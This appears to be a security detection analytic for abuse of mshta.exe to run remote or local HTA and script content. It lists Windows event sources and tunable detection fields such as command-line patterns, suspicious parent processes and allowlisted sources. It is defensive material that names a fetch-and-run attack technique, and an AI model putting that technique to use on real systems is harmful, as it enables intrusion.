Detection of mshta.exe execution where command-line arguments reference remote or local HTA/script content (VBScript/JScript) followed by subsequent file creation, network retrieval, or process spawning that indicates payload execution outside standard Internet Explorer security context. Correlation includes parent process lineage, command-line inspection, and network connection creation to untrusted or anomalous endpoints.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3 |
| File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11 |
| Field | Description |
|---|---|
| CommandLinePattern | Regex patterns for mshta.exe arguments referencing remote HTA/script content; may need tuning to exclude known-good internal scripts. |
| SuspiciousParentProcesses | List of parent processes considered suspicious when spawning mshta.exe (e.g., Office applications, script interpreters). |
| AllowedHTASources | Whitelist of domains/paths from which legitimate HTAs are executed. |
| TimeWindow | Time threshold for correlating mshta.exe execution with subsequent network connections or file creations. |